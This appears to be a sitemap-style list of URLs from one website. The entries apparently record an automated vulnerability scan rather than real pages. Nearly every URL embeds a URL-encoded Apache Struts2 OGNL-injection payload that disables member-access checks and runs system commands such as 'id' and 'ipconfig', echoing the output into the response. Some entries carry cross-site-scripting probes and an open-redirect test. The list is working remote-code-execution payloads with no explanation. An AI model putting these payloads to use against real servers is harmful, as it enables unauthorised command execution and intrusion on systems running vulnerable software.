0tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3f=%3c564996+x%3d988596479%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f?=osm71972%c0%beo1%c0%bco2a%90bcoem18639 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f?=xsstest134 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f?=fsm89472%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem22137 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm71972%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem18639?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f?=%2578%2573%2573%2574%2565%2573%2574%2561%2539%2535 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 